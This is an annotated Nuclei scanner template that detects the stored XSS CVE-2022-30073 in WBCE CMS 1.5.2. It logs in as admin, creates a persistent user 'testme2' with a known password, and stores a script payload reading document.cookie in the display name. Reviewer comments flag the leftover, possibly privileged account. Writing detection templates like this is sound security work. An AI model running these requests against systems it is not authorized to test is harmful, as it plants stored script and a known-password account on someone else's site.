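# Nuclei template: authenticated check for stored XSS in the WBCE CMS 1.5.2
# user-management form (Display Name field).
#
# Layout restored from a rendered file view: table-cell residue removed and
# nesting re-indented. No key, value or request text has been changed.
#
# Operational caveats for whoever runs this check:
#   * It needs a working admin login, supplied at run time through the
#     {{username}} and {{password}} variables.
#   * The third request is state-changing. It persists a new user
#     (testme2, fixed password) whose display name is the script marker.
#     Delete that account after the scan, otherwise the target keeps an
#     active account with a known password and a stored payload in the
#     admin user list.
id: CVE-2022-30073

info:
  name: WBCE CMS 1.5.2 - Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    WBCE CMS 1.5.2 contains a stored cross-site scripting vulnerability via \admin\user\save.php Display Name parameters.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Upgrade to a patched version of WBCE CMS or apply the vendor-supplied patch to mitigate this vulnerability.
  reference:
    - https://github.com/APTX-4879/CVE
    - https://github.com/APTX-4879/CVE/blob/main/CVE-2022-30073.pdf
    - https://nvd.nist.gov/vuln/detail/CVE-2022-30073
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    # PR:L / UI:R in the vector: an authenticated user stores the value and
    # another user has to view the page for the script to run.
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2022-30073
    cwe-id: CWE-79
    epss-score: 0.00205
    epss-percentile: 0.5842
    cpe: cpe:2.3:a:wbce:wbce_cms:1.5.2:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: wbce
    product: wbce_cms
  tags: cve2022,cve,wbcecms,xss,wbce

http:
  - raw:
      # Request 1: log in to the admin backend.
      # NOTE(review): the username/password field-name suffixes are fixed
      # strings here. If the target generates them per session, this login
      # would fail and the check would stay silent (false negative) - confirm
      # against a 1.5.2 install.
      - |
        POST /admin/login/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        url=&username_fieldname=username_axh5kevh&password_fieldname=password_axh5kevh&username_axh5kevh={{username}}&password_axh5kevh={{password}}&submit=Login
      # Request 2: load the user list; the extractor below reads the
      # anti-CSRF formtoken from this response body.
      - |
        GET /admin/users/index.php HTTP/1.1
        Host: {{Hostname}}
      # Request 3: create the test user with the script marker as display_name.
      # This write persists on the target (see the caveats at the top).
      # NOTE(review): groups[]=1 is presumably the administrators group, which
      # would make the leftover account privileged - confirm.
      - |
        POST /admin/users/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        formtoken={{formtoken}}&user_id=&username_fieldname=username_tep83j9z&username_tep83j9z=testme2&password=temp1234&password2=temp1234&display_name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email=testme2%40abc.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=
      # Request 4: reload the user list so the stored value is rendered back.
      - |
        GET /admin/users/index.php HTTP/1.1
        Host: {{Hostname}}

    # All three matchers must hold for a finding.
    matchers-condition: and
    matchers:
      # The marker must appear unencoded inside the markup, together with the
      # product string, i.e. the stored display name is rendered without
      # output encoding.
      - type: word
        part: body
        words:
          - "<p><b><script>alert(document.cookie)</script>"
          - "WBCECMS"
        condition: and

      # Only count responses the browser would treat as HTML.
      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

    extractors:
      # internal: true keeps the token out of the results; it only feeds the
      # {{formtoken}} placeholder in request 3.
      - type: regex
        name: formtoken
        group: 1
        regex:
          - '<input\stype="hidden"\sname="formtoken"\svalue="([^"]*)"\s/>'
        internal: true
        part: body
# NOTE(review): the digest below was carried over from the source page. It was
# presumably computed over the upstream template text, so it is not expected to
# verify against this annotated copy - re-sign before relying on signature checks.
# digest: 4b0a00483046022100b2a548c5526e06565ede6b31dec394968ae49e92e911f9c3b895a967aa6b9d710221008fca32c04e5b0118fad8d67392dd3458f800c555df646fd1ceb93919c796b35d:922c64590222798bb761d5b6d8e72950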